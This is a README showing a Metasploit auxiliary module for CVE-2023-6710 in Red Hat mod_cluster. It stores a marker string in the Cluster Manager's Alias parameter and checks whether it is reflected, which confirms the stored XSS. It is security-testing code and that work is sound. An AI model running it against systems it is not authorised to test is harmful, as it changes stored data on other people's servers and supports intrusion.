README.md
Rendering markdown...
require 'msf/core'
require 'nokogiri'
require 'net/http'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
Rank = ExcellentRanking
def initialize(info = {})
super(update_info(info,
'Name' => 'Red Hat, mod_cluster Stored Cross-Site Scripting',
'Description' => %q{
This module exploits CVE-2023-6710 by checking for the Cluster Manager URL
on a given website, updating the Alias parameter to "<DedSec-47>". It then
examines the response for the presence of the hardcoded value, confirming if
the target is vulnerable to Stored Cross-Site Scripting (XSS).
},
'Author' => ["Mohamed Mounir Boudjema"], #please i want to add company name as example "Mohamed Mounir Boudjema\n Company: Intervalle Technologies"
'License' => MSF_LICENSE,
'References' => [
['CVE', '2023-6710'],
[ 'URL', 'https://github.com/DedSec-47/CVE-2023-6710/' ]
],
'Platform' => 'unix',
'DisclosureDate' => '12-12-2023',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [CONFIG_CHANGES],
'SideEffects' => [UNRELIABLE_SESSION]
},
))
# Step 1: Registering Module Options
register_options([
OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
])
end
# Step 2: Initial Host Run
def run_host(ip)
print_good("Preparing the groundwork for the exploitation on #{datastore['RHOSTS']}#{datastore['TARGETURI']}")
# Step 3: Checking for Cluster Manager URL
print_status("Starting check on #{datastore['RHOSTS']}#{datastore['TARGETURI']}")
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI']),
'method' => 'GET'
})
if res && res.code == 200
print_good("Check executed successfully on #{datastore['RHOSTS']}#{datastore['TARGETURI']}")
# Step 4: Checking for Alias Parameter
soup = Nokogiri::HTML(res.body)
soup.search('a[href]').each do |link|
if link['href'].include?(datastore['TARGETURI']) && link['href'].include?('Alias')
cluster_manager_url_mod = link['href']
exploit(cluster_manager_url_mod)
return
end
end
print_error("Unable to retrieve the alias parameter on #{datastore['RHOSTS']}#{datastore['TARGETURI']}")
else
print_error("Unable to establish a connection with #{datastore['RHOSTS']}#{datastore['TARGETURI']}")
end
print_error("Exploit aborted on #{datastore['RHOSTS']}#{datastore['TARGETURI']}")
end
def exploit(url)
# Step 5: Updating Alias Parameter Value
print_status("Preparing the injection on #{datastore['RHOSTS']}#{datastore['TARGETURI']}")
uri = URI(url)
params = CGI.parse(uri.query || "")
new_alias_value = '<DedSec-47>'
params['Alias'] = [new_alias_value]
uri.query = URI.encode_www_form(params)
modified_url = uri.to_s
print_good("Injection executed successfully for #{datastore['RHOSTS']}#{modified_url}")
res = send_request_cgi({
'uri' => modified_url,
'method' => 'GET'
})
# Step 6: Checking Response for Injected Value
if res && res.code == 200
if res.body.include?(new_alias_value)
print_error("The target #{datastore['RHOSTS']} is vulnerable.")
else
print_good("The target #{datastore['RHOSTS']} is not vulnerable.")
end
else
print_error("Error: Unable to retrieve a valid response from the target.")
end
end
end